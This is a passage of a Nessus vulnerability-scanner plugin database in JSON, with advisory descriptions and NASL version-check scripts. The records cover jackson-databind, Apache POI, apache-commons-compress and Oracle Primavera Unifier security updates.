}\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:30:59", "description": "- Update jackson-parent to version 2.10.\n\n - Update jackson-bom to version 2.10.0.\n\n - Update jackson-annotations to version 2.10.0.\n\n - Update jackson-core to version 2.10.0.\n\n - Update jackson-databind to version 2.10.0.\n\nResolves CVE-2019-14540, CVE-2019-16335, CVE-2019-16942, CVE-2019-16943.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2019-10-14T00:00:00", "type": "nessus", "title": "Fedora 30 : jackson-annotations / jackson-bom / jackson-core / jackson-databind / etc (2019-b171554877)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-14540", "CVE-2019-16335", "CVE-2019-16942", "CVE-2019-16943"], "modified": "2019-12-19T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:jackson-annotations", "p-cpe:/a:fedoraproject:fedora:jackson-bom", "p-cpe:/a:fedoraproject:fedora:jackson-core", "p-cpe:/a:fedoraproject:fedora:jackson-databind", "p-cpe:/a:fedoraproject:fedora:jackson-parent", "cpe:/o:fedoraproject:fedora:30"], "id": "FEDORA_2019-B171554877.NASL", "href": "https://www.tenable.com/plugins/nessus/129833", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2019-b171554877.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(129833);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/12/19\");\n\n script_cve_id(\"CVE-2019-14540\", \"CVE-2019-16335\", \"CVE-2019-16942\", \"CVE-2019-16943\");\n script_xref(name:\"FEDORA\", value:\"2019-b171554877\");\n\n script_name(english:\"Fedora 30 : jackson-annotations / jackson-bom / jackson-core / jackson-databind / etc (2019-b171554877)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Update jackson-parent to version 2.10.\n\n - Update jackson-bom to version 2.10.0.\n\n - Update jackson-annotations to version 2.10.0.\n\n - Update jackson-core to version 2.10.0.\n\n - Update jackson-databind to version 2.10.0.\n\nResolves CVE-2019-14540, CVE-2019-16335, CVE-2019-16942,\nCVE-2019-16943.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2019-b171554877\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:jackson-annotations\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:jackson-bom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:jackson-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:jackson-databind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:jackson-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:30\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/09/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/10/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/10/14\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^30([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 30\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC30\", reference:\"jackson-annotations-2.10.0-1.fc30\")) flag++;\nif (rpm_check(release:\"FC30\", reference:\"jackson-bom-2.10.0-1.fc30\")) flag++;\nif (rpm_check(release:\"FC30\", reference:\"jackson-core-2.10.0-1.fc30\")) flag++;\nif (rpm_check(release:\"FC30\", reference:\"jackson-databind-2.10.0-1.fc30\")) flag++;\nif (rpm_check(release:\"FC30\", reference:\"jackson-parent-2.10-1.fc30\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jackson-annotations / jackson-bom / jackson-core / jackson-databind / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-25T14:29:45", "description": "More deserialization flaws were discovered in jackson-databind relating to the classes in com.zaxxer.hikari.HikariConfig, com.zaxxer.hikari.HikariDataSource, commons-dbcp and com.p6spy.engine.spy.P6DataSource, which could allow an unauthenticated user to perform remote code execution. The issue was resolved by extending the blacklist and blocking more classes from polymorphic deserialization.\n\nFor Debian 8 'Jessie', these problems have been fixed in version 2.4.2-2+deb8u9.\n\nWe recommend that you upgrade your jackson-databind packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2019-10-03T00:00:00", "type": "nessus", "title": "Debian DLA-1943-1 : jackson-databind security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-14540", "CVE-2019-16335", "CVE-2019-16942", "CVE-2019-16943"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:libjackson2-databind-java", "p-cpe:/a:debian:debian_linux:libjackson2-databind-java-doc", "cpe:/o:debian:debian_linux:8.0"], "id": "DEBIAN_DLA-1943.NASL", "href": "https://www.tenable.com/plugins/nessus/129539", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1943-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(129539);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2019-14540\", \"CVE-2019-16335\", \"CVE-2019-16942\", \"CVE-2019-16943\");\n\n script_name(english:\"Debian DLA-1943-1 : jackson-databind security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"More deserialization flaws were discovered in jackson-databind\nrelating to the classes in com.zaxxer.hikari.HikariConfig,\ncom.zaxxer.hikari.HikariDataSource, commons-dbcp and\ncom.p6spy.engine.spy.P6DataSource, which could allow an\nunauthenticated user to perform remote code execution. The issue was\nresolved by extending the blacklist and blocking more classes from\npolymorphic deserialization.\n\nFor Debian 8 'Jessie', these problems have been fixed in version\n2.4.2-2+deb8u9.\n\nWe recommend that you upgrade your jackson-databind packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2019/10/msg00001.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/jackson-databind\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libjackson2-databind-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libjackson2-databind-java-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/09/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/10/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/10/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"libjackson2-databind-java\", reference:\"2.4.2-2+deb8u9\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libjackson2-databind-java-doc\", reference:\"2.4.2-2+deb8u9\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-25T14:29:49", "description": "According to its self-reported version number, the Oracle Primavera Unifier installation running on the remote web server is 16.1.x or 16.2.x prior to 16.2.15.10, or 17.7.x through 17.12.x prior to 17.12.11.1, or 18.8.x prior to 18.8.13.0. It is, therefore, affected by multiple vulnerabilities:\n\n - An unspecified flaw exists in how 'default typing' is handled when 'ehcache' is used in the jackson-databind component of Primavera Unifier. An unauthenticated, remote attacker can exploit this via the network over HTTP to cause remote code execution. (CVE-2019-14379)\n\n - An information disclosure vulnerability exists in the jackson-databind component of Primavera Unifier.\n An unauthenticated, remote attacker can exploit this via an externally exposed JSON endpoint if the service has the mysql-connector-java jar in the classpath, and the attacker can host a crafted MySQL server accessible by the victim. An attacker can send a crafted JSON message to read arbitrary local files on the server. (CVE-2019-12086)\n\n - An information disclosure vulnerability exists in the jackson-databind component of Primavera Unifier.\n An unauthenticated, remote attacker can exploit this via an externally exposed JSON endpoint if the service has the logback jar in the classpath, which can allow information disclosure. (CVE-2019-14439)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2019-10-21T00:00:00", "type": "nessus", "title": "Oracle Primavera Unifier Multiple Vulnerabilities (Oct 2019 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-12626", "CVE-2019-11358", "CVE-2019-12086", "CVE-2019-14379", "CVE-2019-14439"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:oracle:primavera_unifier"], "id": "ORACLE_PRIMAVERA_UNIFIER_CPU_OCT_2019.NASL", "href": "https://www.tenable.com/plugins/nessus/130070", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(130070);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2017-12626\",\n \"CVE-2019-11358\",\n \"CVE-2019-12086\",\n \"CVE-2019-14379\",\n \"CVE-2019-14439\"\n );\n script_bugtraq_id(102879, 108023, 109227);\n script_xref(name:\"IAVA\", value:\"2019-A-0380\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0004\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n\n script_name(english:\"Oracle Primavera Unifier Multiple Vulnerabilities (Oct 2019 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application running on the remote web server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the Oracle Primavera Unifier installation running on the remote web\nserver is 16.1.x or 16.2.x prior to 16.2.15.10, or 17.7.x through 17.12.x prior to 17.12.11.1, or 18.8.x prior to\n18.8.13.0. It is, therefore, affected by multiple vulnerabilities:\n\n - An unspecified flaw exists in how 'default typing' is handled when 'ehcache' is used in the\n jackson-databind component of Primavera Unifier. An unauthenticated, remote attacker can exploit this\n via the network over HTTP to cause remote code execution. (CVE-2019-14379)\n\n - An information disclosure vulnerability exists in the jackson-databind component of Primavera Unifier.\n An unauthenticated, remote attacker can exploit this via an externally exposed JSON endpoint if the\n service has the mysql-connector-java jar in the classpath, and the attacker can host a crafted MySQL\n server accessible by the victim. An attacker can send a crafted JSON message to read arbitrary local\n files on the server. (CVE-2019-12086)\n\n - An information disclosure vulnerability exists in the jackson-databind component of Primavera Unifier.\n An unauthenticated, remote attacker can exploit this via an externally exposed JSON endpoint if the\n service has the logback jar in the classpath, which can allow information disclosure. (CVE-2019-14439)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b370bc74\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Oracle Primavera Unifier version 16.2.15.10 / 17.12.11.1 / 18.8.13.0 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-14379\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/10/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/10/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/10/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:primavera_unifier\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_primavera_unifier.nbin\");\n script_require_keys(\"installed_sw/Oracle Primavera Unifier\", \"www/weblogic\");\n script_require_ports(\"Services/www\", 8002);\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('vcf.inc');\n\nget_install_count(app_name:'Oracle Primavera Unifier', exit_if_zero:TRUE);\n\nport = get_http_port(default:8002);\nget_kb_item_or_exit('www/weblogic/' + port + '/installed');\n\napp_info = vcf::get_app_info(app:'Oracle Primavera Unifier', port:port);\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { 'min_version' : '16.1.0.0', 'fixed_version' : '16.2.15.10' },\n { 'min_version' : '17.7.0.0', 'fixed_version' : '17.12.11.1' },\n { 'min_version' : '18.8.0.0', 'fixed_version' : '18.8.13.0' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE); \n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:24:33", "description": "Update to latest upstream release and security fix for CVE-2017-12626\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2019-01-03T00:00:00", "type": "nessus", "title": "Fedora 28 : apache-poi (2018-4f2c2615b3)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-12626"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:apache-poi", "cpe:/o:fedoraproject:fedora:28"], "id": "FEDORA_2018-4F2C2615B3.NASL", "href": "https://www.tenable.com/plugins/nessus/120414", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-4f2c2615b3.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(120414);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2017-12626\");\n script_xref(name:\"FEDORA\", value:\"2018-4f2c2615b3\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0004\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n\n script_name(english:\"Fedora 28 : apache-poi (2018-4f2c2615b3)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Update to latest upstream release and security fix for CVE-2017-12626\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-4f2c2615b3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected apache-poi package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:apache-poi\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:28\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^28([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 28\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC28\", reference:\"apache-poi-3.17-1.fc28\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache-poi\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:25:00", "description": "The version of Apache POI installed on the remote host is a version prior to 3.17. It is, therefore, affected by multiple DoS vulnerabilities.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2018-02-09T00:00:00", "type": "nessus", "title": "Apache POI < 3.17 Multiple DoS Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-12626"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:apache:poi", "cpe:/a:oracle:jre", "cpe:/a:oracle:jdk"], "id": "APACHE_POI_3_17.NASL", "href": "https://www.tenable.com/plugins/nessus/106717", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(106717);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2017-12626\");\n script_bugtraq_id(102879);\n script_xref(name:\"IAVB\", value:\"2018-B-0019-S\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0004\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n\n script_name(english:\"Apache POI < 3.17 Multiple DoS Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Apache POI installed on the remote host is affected by multiple DoS vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache POI installed on the remote host is a version prior to 3.17. It is, therefore, affected by\nmultiple DoS vulnerabilities.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported\nversion number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://poi.apache.org/changes.html#3.17\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache POI 3.17 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-12626\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/02/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:poi\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:jre\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:jdk\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"apache_poi_detect.nbin\");\n script_require_keys(\"installed_sw/Apache POI\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\ninclude(\"vcf_extras.inc\");\n\napp_info = vcf::get_app_info(app:\"Apache POI\");\n\nconstraints = [{ \"fixed_version\" : \"3.17\" }];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:23:59", "description": "Fix for CVE-2018-11771\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2019-01-03T00:00:00", "type": "nessus", "title": "Fedora 29 : apache-commons-compress (2018-1b7b0ad759)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11771"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:apache-commons-compress", "cpe:/o:fedoraproject:fedora:29"], "id": "FEDORA_2018-1B7B0AD759.NASL", "href": "https://www.tenable.com/plugins/nessus/120266", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-1b7b0ad759.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(120266);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2018-11771\");\n script_xref(name:\"FEDORA\", value:\"2018-1b7b0ad759\");\n\n script_name(english:\"Fedora 29 : apache-commons-compress (2018-1b7b0ad759)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix for CVE-2018-11771\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-1b7b0ad759\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache-commons-compress package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n 